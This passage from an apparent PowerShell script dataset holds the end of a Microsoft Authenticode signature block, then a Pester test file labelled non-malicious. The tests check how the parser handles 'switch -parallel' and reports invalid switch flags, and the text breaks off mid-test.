KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDYk0v9DgxHXE7Y # HJobQ9BIPo26EzBQvicpkPO77AOfz6CCEW4wggh+MIIHZqADAgECAhM2AAAB33OB # lxa+Mv0NAAIAAAHfMA0GCSqGSIb3DQEBCwUAMEExEzARBgoJkiaJk/IsZAEZFgNH # QkwxEzARBgoJkiaJk/IsZAEZFgNBTUUxFTATBgNVBAMTDEFNRSBDUyBDQSAwMTAe # Fw0yNDAxMjAwMTMzNDRaFw0yNTAxMTkwMTMzNDRaMCQxIjAgBgNVBAMTGU1pY3Jv # c29mdCBBenVyZSBDb2RlIFNpZ24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK # AoIBAQDVucAmkbIWpspYysyydQyyRh2L8q5igYFcy2vDk8xGvVMRBhxwbOsJIEd0 # wY8N7WU/xgkYMnSsM4vmc2B49DGdrAjSJqbsx0zf+DLFjrBITUecdRhlq0VKGX8U # bVOkg0aIfFNLRs4DSrCZYh26zyB8qkL/jUmB7DhcBEhhgOlXRQ4LHnUv7qf+iXqD # uwFz9tUTAh8JGsgLRBK0oSsRfUB+FJF2KyUxzmeFXJKiEynsWz4kqoM91ag1Yw0U # 8d0e+RgAKi3Ft1cXA+3qKM6I1H11e/NdIjh7oThvrBtfEngwlwbTF3KZOHdhLBFZ # 18U4v8VeTlb4r94346CY2+SKnQa7AgMBAAGjggWKMIIFhjApBgkrBgEEAYI3FQoE # HDAaMAwGCisGAQQBgjdbAQEwCgYIKwYBBQUHAwMwPQYJKwYBBAGCNxUHBDAwLgYm # KwYBBAGCNxUIhpDjDYTVtHiE8Ys+hZvdFs6dEoFgg93NZoaUjDICAWQCAQ4wggJ2 # BggrBgEFBQcBAQSCAmgwggJkMGIGCCsGAQUFBzAChlZodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpaW5mcmEvQ2VydHMvQlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1F # JTIwQ1MlMjBDQSUyMDAxKDIpLmNydDBSBggrBgEFBQcwAoZGaHR0cDovL2NybDEu # YW1lLmdibC9haWEvQlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1FJTIwQ1MlMjBDQSUy # MDAxKDIpLmNydDBSBggrBgEFBQcwAoZGaHR0cDovL2NybDIuYW1lLmdibC9haWEv # QlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1FJTIwQ1MlMjBDQSUyMDAxKDIpLmNydDBS # BggrBgEFBQcwAoZGaHR0cDovL2NybDMuYW1lLmdibC9haWEvQlkyUEtJQ1NDQTAx # LkFNRS5HQkxfQU1FJTIwQ1MlMjBDQSUyMDAxKDIpLmNydDBSBggrBgEFBQcwAoZG # aHR0cDovL2NybDQuYW1lLmdibC9haWEvQlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1F # JTIwQ1MlMjBDQSUyMDAxKDIpLmNydDCBrQYIKwYBBQUHMAKGgaBsZGFwOi8vL0NO # PUFNRSUyMENTJTIwQ0ElMjAwMSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2Vy # dmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1BTUUsREM9R0JM # P2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0 # aG9yaXR5MB0GA1UdDgQWBBSO7i0qme7tjtjFjyuIjlmGM6cbCTAOBgNVHQ8BAf8E # BAMCB4AwRQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3Jh # dGlvbjEWMBQGA1UEBRMNMjM2MTY3KzUwMTk3MDCCAeYGA1UdHwSCAd0wggHZMIIB # 1aCCAdGgggHNhj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpaW5mcmEvQ1JM # L0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmwxLmFtZS5nYmwv # Y3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmwyLmFtZS5n # YmwvY3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmwzLmFt # ZS5nYmwvY3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmw0 # LmFtZS5nYmwvY3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGgb1sZGFwOi8v # L0NOPUFNRSUyMENTJTIwQ0ElMjAwMSgyKSxDTj1CWTJQS0lDU0NBMDEsQ049Q0RQ # LENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZp # Z3VyYXRpb24sREM9QU1FLERDPUdCTD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0 # P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwHwYDVR0jBBgw # FoAUllGE4Gtve/7YBqvD8oXmKa5q+dQwHwYDVR0lBBgwFgYKKwYBBAGCN1sBAQYI # KwYBBQUHAwMwDQYJKoZIhvcNAQELBQADggEBAJe/YXNSCoXitLf/X5pfJZpep3cs # jdqmBgg+8Kr++8XMjWwdm4tiLasJMUPCgmp5NYn3wC4GefGYwfF7Xm2FMSR2i6QU # HjigGu6BjdWQh4EwGaNqXLkXlUM7Ww2Z0KrRtpCL16DCOTNZuCFPAytSHFskPWrr # 6q3EBuiM6P5VLgFSKiAxcunldJorbrBrvZSZib1OINzFGAQszUR0ytovW6FOp+uo # VhiQCqnOheC1ppnZPss7vnXoogyO0xgSW40bRlltGfwnlOd3IZ/43ZOj5XeeShg5 # 2SzVEiyYrZjD17MSNzQM1JKI07+mtAC7D+eZ/+g2pM/91oHcrDq9Nq4QrS0wggjo # MIIG0KADAgECAhMfAAAAUeqP9pxzDKg7AAAAAABRMA0GCSqGSIb3DQEBCwUAMDwx # EzARBgoJkiaJk/IsZAEZFgNHQkwxEzARBgoJkiaJk/IsZAEZFgNBTUUxEDAOBgNV # BAMTB2FtZXJvb3QwHhcNMjEwNTIxMTg0NDE0WhcNMjYwNTIxMTg1NDE0WjBBMRMw # EQYKCZImiZPyLGQBGRYDR0JMMRMwEQYKCZImiZPyLGQBGRYDQU1FMRUwEwYDVQQD # EwxBTUUgQ1MgQ0EgMDEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDJ # mlIJfQGejVbXKpcyFPoFSUllalrinfEV6JMc7i+bZDoL9rNHnHDGfJgeuRIYO1LY # /1f4oMTrhXbSaYRCS5vGc8145WcTZG908bGDCWr4GFLc411WxA+Pv2rteAcz0eHM # H36qTQ8L0o3XOb2n+x7KJFLokXV1s6pF/WlSXsUBXGaCIIWBXyEchv+sM9eKDsUO # LdLTITHYJQNWkiryMSEbxqdQUTVZjEz6eLRLkofDAo8pXirIYOgM770CYOiZrcKH # K7lYOVblx22pdNawY8Te6a2dfoCaWV1QUuazg5VHiC4p/6fksgEILptOKhx9c+ia # piNhMrHsAYx9pUtppeaFAgMBAAGjggTcMIIE2DASBgkrBgEEAYI3FQEEBQIDAgAC # MCMGCSsGAQQBgjcVAgQWBBQSaCRCIUfL1Gu+Mc8gpMALI38/RzAdBgNVHQ4EFgQU # llGE4Gtve/7YBqvD8oXmKa5q+dQwggEEBgNVHSUEgfwwgfkGBysGAQUCAwUGCCsG # AQUFBwMBBggrBgEFBQcDAgYKKwYBBAGCNxQCAQYJKwYBBAGCNxUGBgorBgEEAYI3 # CgMMBgkrBgEEAYI3FQYGCCsGAQUFBwMJBggrBgEFBQgCAgYKKwYBBAGCN0ABAQYL # KwYBBAGCNwoDBAEGCisGAQQBgjcKAwQGCSsGAQQBgjcVBQYKKwYBBAGCNxQCAgYK # KwYBBAGCNxQCAwYIKwYBBQUHAwMGCisGAQQBgjdbAQEGCisGAQQBgjdbAgEGCisG # AQQBgjdbAwEGCisGAQQBgjdbBQEGCisGAQQBgjdbBAEGCisGAQQBgjdbBAIwGQYJ # KwYBBAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMBIGA1UdEwEB/wQI # MAYBAf8CAQAwHwYDVR0jBBgwFoAUKV5RXmSuNLnrrJwNp4x1AdEJCygwggFoBgNV # HR8EggFfMIIBWzCCAVegggFToIIBT4YxaHR0cDovL2NybC5taWNyb3NvZnQuY29t # L3BraWluZnJhL2NybC9hbWVyb290LmNybIYjaHR0cDovL2NybDIuYW1lLmdibC9j # cmwvYW1lcm9vdC5jcmyGI2h0dHA6Ly9jcmwzLmFtZS5nYmwvY3JsL2FtZXJvb3Qu # Y3JshiNodHRwOi8vY3JsMS5hbWUuZ2JsL2NybC9hbWVyb290LmNybIaBqmxkYXA6 # Ly8vQ049YW1lcm9vdCxDTj1BTUVSb290LENOPUNEUCxDTj1QdWJsaWMlMjBLZXkl # MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPUFNRSxE # Qz1HQkw/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNz # PWNSTERpc3RyaWJ1dGlvblBvaW50MIIBqwYIKwYBBQUHAQEEggGdMIIBmTBHBggr # BgEFBQcwAoY7aHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraWluZnJhL2NlcnRz # L0FNRVJvb3RfYW1lcm9vdC5jcnQwNwYIKwYBBQUHMAKGK2h0dHA6Ly9jcmwyLmFt # ZS5nYmwvYWlhL0FNRVJvb3RfYW1lcm9vdC5jcnQwNwYIKwYBBQUHMAKGK2h0dHA6 # Ly9jcmwzLmFtZS5nYmwvYWlhL0FNRVJvb3RfYW1lcm9vdC5jcnQwNwYIKwYBBQUH # MAKGK2h0dHA6Ly9jcmwxLmFtZS5nYmwvYWlhL0FNRVJvb3RfYW1lcm9vdC5jcnQw # gaIGCCsGAQUFBzAChoGVbGRhcDovLy9DTj1hbWVyb290LENOPUFJQSxDTj1QdWJs # aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u # LERDPUFNRSxEQz1HQkw/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNl # cnRpZmljYXRpb25BdXRob3JpdHkwDQYJKoZIhvcNAQELBQADggIBAFAQI7dPD+jf # XtGt3vJp2pyzA/HUu8hjKaRpM3opya5G3ocprRd7vdTHb8BDfRN+AD0YEmeDB5HK # QoG6xHPI5TXuIi5sm/LeADbV3C2q0HQOygS/VT+m1W7a/752hMIn+L4ZuyxVeSBp # fwf7oQ4YSZPh6+ngZvBHgfBaVz4O9/wcfw91QDZnTgK9zAh9yRKKls2bziPEnxeO # ZMVNaxyV0v152PY2xjqIafIkUjK6vY9LtVFjJXenVUAmn3WCPWNFC1YTIIHw/mD2 # cTfPy7QA1pT+GPARAKt0bKtq9aCd/Ym0b5tPbpgCiRtzyb7fbNS1dE740re0COE6 # 7YV2wbeo2sXixzvLftH8L7s9xv9wV+G22qyKt6lmKLjFK1yMw4Ni5fMabcgmzRvS # jAcbqgp3tk4a8emaaH0rz8MuuIP+yrxtREPXSqL/C5bzMzsikuDW9xH10graZzSm # PjilzpRfRdu20/9UQmC7eVPZ4j1WNa1oqPHfzET3ChIzJ6Q9G3NPCB+7KwX0OQmK # yv7IDimj8U/GlsHD1z+EF/fYMf8YXG15LamaOAohsw/ywO6SYSreVW+5Y0mzJutn # BC9Cm9ozj1+/4kqksrlhZgR/CSxhFH3BTweH8gP2FEISRtShDZbuYymynY1un+Ry # fiK9+iVTLdD1h/SxyxDpZMtimb4CgJQlMYIZzDCCGcgCAQEwWDBBMRMwEQYKCZIm # iZPyLGQBGRYDR0JMMRMwEQYKCZImiZPyLGQBGRYDQU1FMRUwEwYDVQQDEwxBTUUg # Q1MgQ0EgMDECEzYAAAHfc4GXFr4y/Q0AAgAAAd8wDQYJYIZIAWUDBAIBBQCgga4w # GQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEOMAwGCisG # AQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIP8eTNEiejKQB9/dYhyccEf8eROU+H+H # ZyCB81P0RkaAMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8AcwBvAGYA # dKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEBBQAEggEA # Z8h04ocJ7ishvlARv7Ne2c647/MtmmerrzpmaoWvChevycTEwpLXXlO15Fcvc4Xp # aL71BLbEhbooSJJvdrtCS8NEMAYwIcBU+9lT16ZN6IWmEqJqmM46FaVtaZ6/HqnO # ewqB4DAQyi4uHAadZTR4tqni8CcUcX7/q1UMtMrZwtEyEGExwtku7d2GgKgoDyv4 # z8hQA0C3gf6HeE0KD/SsZJ6jMxxp06MK6LAprLoINQat/8L7AY0oGKkyojokywk6 # NhrGa3jKPN0UixtgYWMqmcGmictYBjTie/svycWImc0zfO6v42dv9yMgZwsDTpid # zJE+QRjvFIgORdJ+p7yru6GCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCCF3wGCSqG # SIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsqhkiG9w0B # CRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFlAwQCAQUA # BCCE7FaMT0H46M0uFyiJ/e3yIIbaKWmRS8c5Wt9JawrvegIGZfxjaMOwGBMyMDI0 # MDQwOTAwNDE1Mi41ODhaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJVUzETMBEG # A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj # cm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBP # cGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODYwMy0wNUUwLUQ5 # NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2WgghHqMIIH # IDCCBQigAwIBAgITMwAAAfGzRfUn6MAW1gABAAAB8TANBgkqhkiG9w0BAQsFADB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1NTVaFw0y # NTAzMDUxODQ1NTVaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv # bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0 # aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYD # VQQLEx5uU2hpZWxkIFRTUyBFU046ODYwMy0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1p # Y3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEBAQUAA4IC # DwAwggIKAoICAQCxulCZttIf8X97rW9/J+Q4Vg9PiugB1ya1/DRxxLW2hwy4QgtU # 3j5fV75ZKa6XTTQhW5ClkGl6gp1nd5VBsx4Jb+oU4PsMA2foe8gP9bQNPVxIHMJu # 6TYcrrn39Hddet2xkdqUhzzySXaPFqFMk2VifEfj+HR6JheNs2LLzm8FDJm+pBdd # PDLag/R+APIWHyftq9itwM0WP5Z0dfQyI4WlVeUS+votsPbWm+RKsH4FQNhzb0t/ # D4iutcfCK3/LK+xLmS6dmAh7AMKuEUl8i2kdWBDRcc+JWa21SCefx5SPhJEFgYhd # GPAop3G1l8T33cqrbLtcFJqww4TQiYiCkdysCcnIF0ZqSNAHcfI9SAv3gfkyxqQN # JJ3sTsg5GPRF95mqgbfQbkFnU17iYbRIPJqwgSLhyB833ZDgmzxbKmJmdDabbzS0 # yGhngHa6+gwVaOUqcHf9w6kwxMo+OqG3QZIcwd5wHECs5rAJZ6PIyFM7Ad2hRUFH # RTi353I7V4xEgYGuZb6qFx6Pf44i7AjXbptUolDcVzYEdgLQSWiuFajS6Xg3k7Cy # 8TiM5HPUK9LZInloTxuULSxJmJ7nTjUjOj5xwRmC7x2S/mxql8nvHSCN1OED2/wE # COot6MEe9bL3nzoKwO8TNlEStq5scd25GA0gMQO+qNXV/xTDOBTJ8zBcGQIDAQAB # o4IBSTCCAUUwHQYDVR0OBBYEFLy2xe59sCE0SjycqE5Erb4YrS1gMB8GA1UdIwQY # MBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCGTmh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRpbWUt # U3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4wXAYIKwYB # BQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWlj # cm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwGA1UdEwEB # /wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0G # CSqGSIb3DQEBCwUAA4ICAQDhSEjSBFSCbJyl3U/QmFMW2eLPBknnlsfID/7gTMvA # NEnhq08I9HHbbqiwqDEHSvARvKtL7j0znICYBbMrVSmvgDxU8jAGqMyiLoM80788 # So3+T6IZV//UZRJqBl4oM3bCIQgFGo0VTeQ6RzYL+t1zCUXmmpPmM4xcScVFATXj # 5Tx7By4ShWUC7Vhm7picDiU5igGjuivRhxPvbpflbh/bsiE5tx5cuOJEJSG+uWcq # ByR7TC4cGvuavHSjk1iRXT/QjaOEeJoOnfesbOdvJrJdbm+leYLRI67N3cd8B/su # U21tRdgwOnTk2hOuZKs/kLwaX6NsAbUy9pKsDmTyoWnGmyTWBPiTb2rp5ogo8Y8h # MU1YQs7rHR5hqilEq88jF+9H8Kccb/1ismJTGnBnRMv68Ud2l5LFhOZ4nRtl4lHr # i+N1L8EBg7aE8EvPe8Ca9gz8sh2F4COTYd1PHce1ugLvvWW1+aOSpd8NnwEid4zg # D79ZQxisJqyO4lMWMzAgEeFhUm40FshtzXudAsX5LoCil4rLbHfwYtGOpw9DVX3j # XAV90tG9iRbcqjtt3vhW9T+L3fAZlMeraWfh7eUmPltMU8lEQOMelo/1ehkIGO7Y # ZOHxUqeKpmF9QaW8LXTT090AHZ4k6g+tdpZFfCMotyG+E4XqN6ZWtKEBQiE3xL27 # BDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQEL # BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNV # BAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDEwMB4X # DTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMCVVMxEzAR # BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1p # Y3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3Rh # bXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM # 57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm # 95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzB # RMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBb # fowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCO # Mcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYw # XE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW # /aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/w # EPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1qGFphAXPK # Z6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJYfM2 # BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXbGjfH # CBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYB # BAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8v # BO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYM # KwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEF # BQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBW # BgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUH # AQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtp # L2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0BAQsF # AAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518Jx # Nj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+ # iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2 # pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefw # C2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7 # T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFO # Ry3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxnGSgkujhL # mm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3L # wUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokLjzbaukz5 # m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/OHBE # 0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNNMIICNQIB # ATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEnMCUGA1UE # CxMeblNoaWVsZCBUU1MgRVNOOjg2MDMtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNy # b3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQD7n7Bk4gsM # 2tbU/i+M3BtRnLj096CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpX # YXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg # Q29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAy # MDEwMA0GCSqGSIb3DQEBCwUAAgUA6b6cGDAiGA8yMDI0MDQwODE2Mzg0OFoYDzIw # MjQwNDA5MTYzODQ4WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDpvpwYAgEAMAcC # AQACAgq5MAcCAQACAhN6MAoCBQDpv+2YAgEAMDYGCisGAQQBhFkKBAIxKDAmMAwG # CisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEL # BQADggEBAMYRqvusbjsnf1/JhoHRJRzwZgEccC4v3b+/bT11MCzovxfhNpK8AxTZ # IcnJsf9b0MiO4zMJsn94KFMiT1ADJiPPdD5cAkoG1ZPLVVcOZZrOrYB9U6hba5j4 # v4UIdHvzvakbtifSxa5jwGGxxWvTfjOYeI1/nAJUN932hd0yfqOjgKLfzeaPhMb/ # weNaTCqYgQu/YJbnV519XyQscjZv2FDGuwYi7E6eevjpvXJEcve6RrHBIrSDiYov # hTNj6E34ZyTZL62cCtM8AWwIz8Bbmw3mC/t8QqYAzzxxGfHzrTLcWFU7K12Y6kui # 3ez7FddvIFP8553vgf9gvqj99zFANBIxggQNMIIECQIBATCBkzB8MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg # VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAfGzRfUn6MAW1gABAAAB8TANBglghkgB # ZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3 # DQEJBDEiBCDU7Siww2HSK40HdtIPC9c7THWOtvtORPFAsLZe5TklyzCB+gYLKoZI # hvcNAQkQAi8xgeowgecwgeQwgb0EINV3/T5hS7ijwao466RosB7wwEibt0a1P5Eq # IwEj9hF4MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 # b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh # dGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMA # AAHxs0X1J+jAFtYAAQAAAfEwIgQgO1v/UnSo2k7jUCxlZVmUvUFoHPT/DHCPQQyy # cGoH6DYwDQYJKoZIhvcNAQELBQAEggIAD5RpNbF5lmBMwskqYysnBeJMhXtXUhkH # LTN/gL24IfrLBtP7NQ4TkY9li+yxzGMwUCVsRqvZBO77IjVpLpSjvmyS9VVIjLzB # uK3Nh6xFThjAsVXywdAL4XRAKbOk2YNQy44ZTVhEOySBborMQ+/qx3im44ytSY0D # qvnpmsC9VWgUUAYsDlPH5Kc/5zilC2VL0RtJ21j+ymduJojC/zU33+2tN4N/kvVm # jX6MqsadGDxAriFtj/pYKLKYB7chwEVPcJeq3TMiL/BzK+b+zw+0J6NDzrFDvSnB # spnR++m3ZKy68a8CeMv7cRnWVTIfEoAHwGSTTCab8XbBwhEJHJtktGHoYZ2O9Gdd # 3lP2qEL3clQ7ulY6X6WyoI8Oy8nIOG5LCmR2To1GnkzJE7600aBvqecjraWRtFhK # iUVhtwEAZEV7B1JWiD1xtbnXWSvLbhhLH3YC/3JfARt6pZ87EW6mZDSCfOA1GYCc # 6Nv+Y8PDbz/agieiDgIWG+jFjF256RXlv6COftecH5Hc6SF706JmeM496PFitPYH # FK6TSUFqKE5QGoeze457XruXvpfbYiKEsUW33DZ/77UoRXqJCc2ZJeeFEWF+lyMz # 1H83RKJoHT20ZXNs8Ab6h6HLtvAcRuJZHeBA4+iwtX6v61a1Bm+WdfbIs93ecguh # r7I6RQBd7Ok= # SIG # End signature block
combined_dataset/train/non-malicious/2111.ps1
2111.ps1
Describe 'Parallel switch syntax' -Tags 'CI' { Context 'Should be able to retrieve AST of parallel switch' { BeforeAll { $ast = [System.Management.Automation.Language.Parser]::ParseInput( 'switch -parallel ($foo) {1 {break}}', [ref] $null, [ref] $null) } It '$ast.EndBlock.Statements[0].Flags' { $ast.EndBlock.Statements[0].Flags | Should -BeExactly 'Parallel' } } Context 'Generates an error on invalid parameter' { BeforeAll { $errors = @() $ast = [System.Management.Automation.Language.Parser]::ParseInput( 'switch -bogus ($foo) {1 {break}}', [ref]$null, [ref]$errors) } It '$errors.Count' { $errors.Count | Should -Be 1 } It '$errors[0].ErrorId' { $errors[0].ErrorId | Should -BeExactly 'InvalidSwitchFlag' } } Context 'Generate an error on -parallel' { BeforeAll { $errors = @() $ast = 